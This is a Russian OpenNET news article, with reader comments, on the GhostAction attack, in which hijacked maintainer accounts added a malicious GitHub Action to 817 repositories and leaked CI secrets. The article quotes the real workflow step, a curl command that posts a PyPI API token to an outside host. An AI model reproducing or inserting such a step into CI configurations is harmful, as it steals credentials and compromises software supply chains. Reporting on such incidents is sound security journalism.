The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

В ходе атаки GhostAction скомпрометировано 817 репозиториев на GitHub

06.09.2025 09:15

Исследователи из компании GitGuardian выявили массовую атаку на пользователей GitHub, в ходе которой был получен контроль над 327 учётными записями и осуществлена подстановка вредоносного обработчика Github Action в 817 репозиториев. Атака привела к утечке 3325 секретов, используемых в системах непрерывной интеграции и передаваемых через переменные окружения, включая токены доступа к PyPI, GitHub, NPM, DockerHub и различным облачным хранилищам.

GitHub Actions даёт возможность разработчикам кода прикреплять обработчики для автоматизации различных операций в GitHub. Например, при помощи GitHub Actions можно выполнить определённые проверки и тесты при совершении коммитов или автоматизировать обработку новых Issues. Вредоносный обработчик распространялся под именем "Github Actions Security" и включал в секции "run" команду "curl", отправляющую содержимое переменных окружения на внешний хост при запуске задач в окружении непрерывной интеграции. Вредоносный коммит добавлялся с учётных записей мэйнтейнеров проектов, которые, вероятно, до этого были взломаны или стали жертвой фишинга.

Атака выявлена после разбора аномальной активности, связанной с пакетом FastUUID, предоставляющем Python-обвязку над Rust-библиотекой UUID. Пакет FastUUID, для которого за последнюю неделю зафиксировано почти 1.2 миллиона загрузок, используется в качестве зависимости в популярном проекте LiteLLM, насчитывающем в PyPI более 5 миллионов загрузок в неделю. Анализ изменений в репозитории FastUUID показал, что 2 сентября мэйнтейнер проекта добавил коммит с новым обработчиком Github Action, в котором содержался код для отправки токена к репозиторию PyPI на внешний хост.


      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page

Проблему удалось выявить до того как злоумышленники воспользовались перехваченным токеном - публикации вредоносных изменений или модифицированных версий пакета в PyPI для FastUUID не зафиксировано. Похожие подстановки Github Action выявлены ещё в 816 репозиториях, владельцам которых, а также администрации PyPI, GitHub, NPM и DockerHub, направлены уведомления. По состоянию на вчерашний вечер вредоносные коммиты были отменены примерно в 100 репозиториях. В настоящее время при поиске в GitHub определяется 671 коммит с вредоносным Github Action.

  1. Главная ссылка к новости (https://blog.gitguardian.com/g...)
  2. OpenNews: Google представил проект OSS Rebuild для выявления скрытых изменений в пакетах
  3. OpenNews: Компрометация GitHub Actions-обработчика changed-files, применяемого в 23 тысячах репозиториев
  4. OpenNews: Ошибка в обработчике GitHub Actions привела к публикации вредоносных релизов Ultralytics
  5. OpenNews: GitHub обновил GPG-ключи из-за уязвимости, приводящей к утечке переменных окружения
  6. OpenNews: Атака на инфраструктуру PyTorch, компрометирующая репозиторий и релизы
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/63831-github
Ключевые слова: github, action
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (21) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.4, Аноним (4), 10:18, 06/09/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • –4 +/
    > GitHub Actions даёт возможность разработчикам кода прикреплять обработчики для автоматизации различных операций в GitHub.

    Как новорится, ССЗБ. Нечего в проприетарном не селфхост облаке хранить критичные данные.

     
     
  • 2.7, Аноним (-), 10:30, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +7 +/
    Дядя Петя, ты дундук? (с)

    >  Вредоносный коммит добавлялся с учётных записей мэйнтейнеров проектов, которые, вероятно, до этого были взломаны или стали жертвой фишинга.

    Что мешает взломать твое не проприетарное селфхостед облако?
    Если ты им пользуешься сам, то может тебе хватит "Новая Папка (1)", "Новая Папка (2)" и тд?
    А если у тебя распределенная команда, то вероятность того что их взломают, не меньше гита.

     
     
  • 3.26, Аноним (26), 14:33, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >"Новая Папка (1)", "Новая Папка (2)" и тд

    А что, на self hosted запрещается использовать git daemon?

     
  • 2.22, Анон666 (?), 12:21, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Угу, отрвился хлебом - пеки сам
     

  • 1.6, Андрей (??), 10:25, 06/09/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Никогда такого не было и вот опять ?
     
     
  • 2.8, Аноним (-), 10:33, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Ага.
    Если учетку мейнтенера сломают, то могут сделать плохие вещи.
    Кто бы мог подумать?!!

    ИЧСХ у "типа конкурентов" гитхаба есть такие же экшены
    docs.gitlab.com/user/project/quick_actions/
    docs.gitea.com/usage/actions/comparison

     

  • 1.9, Tron is Whistling (?), 10:33, 06/09/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Системы непрерывной интеграции троянов всё заинтегрировали нормально.
     
     
  • 2.11, Аноним (-), 10:38, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Ваши предложения?
    Передевать код на дискетках как диды?
    Кричать "вася не трогай файл N я туда сейчас буду изменения заливать!"?
    Не делать автотесты перед мерджом?
     
     
  • 3.12, 27730 (?), 10:43, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    да лучше на дискетах, сто процентов безопасно
     
     
  • 4.16, Аноним (16), 11:29, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Особенно, если она размагнитится по пути.
     
     
  • 5.18, Да ну нах (?), 11:42, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Два чая этому господину!
     
  • 3.14, localhostadmin (ok), 10:46, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Зачем до каменного века скатываться? Может достаточно просто не доверять свою чувствительную инфу сомнительным людям?
     
     
  • 4.15, Аноним (-), 10:51, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Сомнительные люди тут кто?
    Мейнтенеры, учетки которых взломали?
    Значит надо обходиться без мейнтенеров и писать все в одну персону.
    А чтобы твою учетку тоже не взломали, не доверять код интернету, и хранить его на подкроватном сервере.
     
     
  • 5.19, localhostadmin (ok), 11:52, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >> Сомнительные люди тут кто?

    Ты хоть новость читал? Очевидно, что разрабы Github Actions Security

     
     
  • 6.20, Ангним (?), 12:02, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Разрабы GitHub actions security просто добавили отправку секретов на деревню дедушке. А вот сам этот экшен добавляли сломанные учётки мэинтейнеров.
     
  • 6.28, PROgrm_JARvis (ok), 14:44, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > разрабы Github Actions Security

    Нет никакого Github Actions Security, там злоумышленники тупо стадию пайплайна так назвали.

     
     
  • 7.29, Аноним (-), 14:49, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Но зачем в это углубляться?
    Увидели название гитхаб, вспомнили что ими владеют майкрософт...
    Всё этого достаточно чтобы полторы извилины уже отключились, во рту начала собираться пена и с праведным гневом пошли писать глупые комментарии.
     
  • 3.17, Tron is Whistling (?), 11:34, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Никаких предложений: говорю ж - нормально всё заинтегрировали, очень удобная штука.
     

  • 1.21, Аноним (21), 12:10, 06/09/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Скажите, а мой репозиторий не скомпрометировали? Как проверить?
     
     
  • 2.25, Аноним (25), 14:25, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Написанному верить: Нет.
    06.09.25 Эксперт по всем вопросам. Имя Фамилия Отчество.
     
     
  • 3.27, Аноним (26), 14:36, 06/09/2025 Скрыто ботом-модератором     [к модератору]
  • +/
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2025 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру